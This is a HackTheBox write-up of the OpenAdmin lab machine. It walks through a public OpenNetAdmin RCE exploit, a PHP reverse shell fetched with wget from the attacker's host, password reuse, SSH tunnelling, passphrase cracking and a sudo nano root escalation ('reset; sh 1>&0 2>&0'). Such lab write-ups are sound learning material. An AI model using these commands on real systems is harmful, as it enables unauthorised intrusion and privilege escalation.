HackTheBox Writeup: OpenAdmin

OpenAdmin was an easy rated Linux machine with a vulnerable version of OpenNetAdmin. A publicly available exploit got us remote code execution in a limited shell - this was converted into a proper reverse shell as www-data. Reuse of a database password yielded SSH access as a user 'jimmy' where we discovered a password protected website that would give the id_rsa key for the user 'joanna'. This website was only accessible internally so a SSH tunnel was used to forward the port to our attacking machine. The password's hash was found in a config file, cracked and entered into the internal website, thereby allowing us to SSH in as 'joanna'. Joanna had the ability to run nano as root and a simple sequence of keypresses let us run commands as root for a root shell and the flag. I added openadmin.htb to my /etc/hosts file and got started.


nmap scan:

Without any kind of creds for SSH, let's check out http:

I checked for a robots.txt file - nothing.

Beginner Breakdown: robots.txt is sometimes used by websites to tell bots or webcrawlers which parts of the website should not be scanned. You can occasionally find sensitive directories in it so I check for it out of habit. You can check mine if you'd like ;)

Time to do some directory bruteforcing with gobuster:

The 'artwork' and 'music' directories have a 301 code but without anything else to go off, let's check them out:

When enumerating a website, I like to use Burp as a proxy as it records things you may not see. I checked the HTTP history and saw this:

Let's see what this 'ona' thing is about:

Initial Foothold

The page very kindly tells us it is version 18.1.1 and the download link goes here so we know we are looking at OpenNetAdmin. Let's check searchsploit:

There's a shell script for RCE that matches the version so I copy it to the working directory. Call me paranoid but I like to look at scripts before I run them just to make sure they are legit and to get the gist of what they are doing:

Beginner Breakdown: The 'URL="${1}"' line is setting the 'URL' variable to the first argument. In Bash,  $1 refers to the first argument - if you run script.sh t3chno cat, $1 would be 't3chno' and $2 would be 'cat'.

I see a while loop with curl to a user-specified URL piped to sed, tail and head which looks pretty safe. Let's feed it the ona url:

Ok, that didn't work. Maybe it's expecting something else. Let's check out the 47772.rb exploit by running searchsploit -x 47772.rb which will show the contents of the file. In it I see this:

Ah, the vulnerability is in login.php! Let's try it again with the proper URL:

Note: 'login.php' worked on my initial run through the machine. On the error-checking run for this post, I had to feed the script http://openadmin.htb/ona/index.php.

We have RCE:

Unfortunately it's not a real shell - you can't change directories and interact like a real shell:

So let's get a real shell going. Since we know php is on the system, I'll go with a php reverse shell. First I'll run this script:

With a python http server running, I tell OpenAdmin to change to the /var/www/html folder and download my reverse shell file:

Beginner Breakdown: In Bash, the semicolon is used to separate commands on one line. In this case, I change directories and download the file in one line. With this limited not-really-a-shell, entering the commands on separate lines would not have worked the way I wanted. Alternatively I could have run wget http://10.10.x.x/rs.php -O /var/www/html/rs.php.

Now that the reverse shell is in its proper place, I'll hit it with curl:

With a netcat listener, we catch a shell:

User pivot - Jimmy

Since we know OpenNetAdmin is running, I check config files and find this:

I take a look at the home directories to see what active users there are:

The n1nj4W4rri0r! password works for SSH as jimmy:

User pivot - Joanna

Enumerating the system shows what looks to be another website called 'internal':

Beginner Breakdown: By default, the Apache webserver will put files in /var/www/html. If there are multiple sites or virtual hosts, they will often be in separate directories in /var/www like this:
The config files that control this are usually in /etc/apache2/sites-enabled.

Let's take a look at a portion of index.php:

I don't speak php very well but I can see that if the username is 'jimmy' and the sha512 hash of the password is that long value, main.php gets loaded. Let's check out main.php:

This looks like it will show us joanna's private SSH key - great! I plugged the long hash into this site and it gave me this password:

Now that we have a password for the internal site, we need to access it. Remember the 'sites-enabled' folder I mentioned? There's an 'internal.conf' file in there:

How do we get access to an internal only website? SSH tunneling!

Beginner Breakdown: Let's take a closer look at latter part of the SSH command. The -L flag is for local port forwarding. The 52846: tells SSH to use port 52846 on local machine) and the last :52846 is the remote port I want mapped to my local port. To make this clearer, if I used the command ssh jimmy@openadmin.htb -L 1337: from my machine, the webserver on OpenAdmin's port 52846 would be forwarded to port 1337 on my machine.

With the tunnel in place, I can access the internal website:

The credentials 'jimmy/Revealed' work and we get Joanna's private key:

You can tell from the 'Proc-Type: 4, ENCRYPTED' line that there is a passphrase on the key. Here I'll use ssh2john.py to convert the key to a format that JohnTheRipper can handle, write it to 'joanna-id.hash' and crack it:

Armed with the passphrase, we can now use her private key to SSH in as Joanna:

The user flag:

Privilege Escalation

Running sudo -l shows us that Joanna can run /bin/nano /opt/priv as root:

The last part of the GTFOBins entry on nano reads:

We run the sudo command, exactly as listed in the sudo -l entry:

Control-r followed by control-x gives us this prompt:

Enter 'reset; sh 1>&0 2>&0' as follows:

BAM! We are dropped into a root shell:

Beginner Breakdown: WTF is with that hieroglyphic looking command you typed into nano to get a root shell??? Let's slice this into chunks:
Control-r in nano prompts you for a file to insert from your current directory.
The subsequent control-x prompts you to execute a command as you see above. If you were to type in the command ifconfig, you would see your network interface config appear in nano. Try it!
reset resets the terminal.
The ; separates commands as explained earlier.
sh 1>&0 2>&0 runs sh and redirects stdout(1) and stderr(2) to file descriptor 0(stdin). Since the control-r we hit wants a file and we redirect sh's stdout and stderr to a file descriptor, we can see output of commands.  It can be tricky to explain and a headache to understand so I'll refer you to this tutorial with examples which should help clear things up.

The root flag: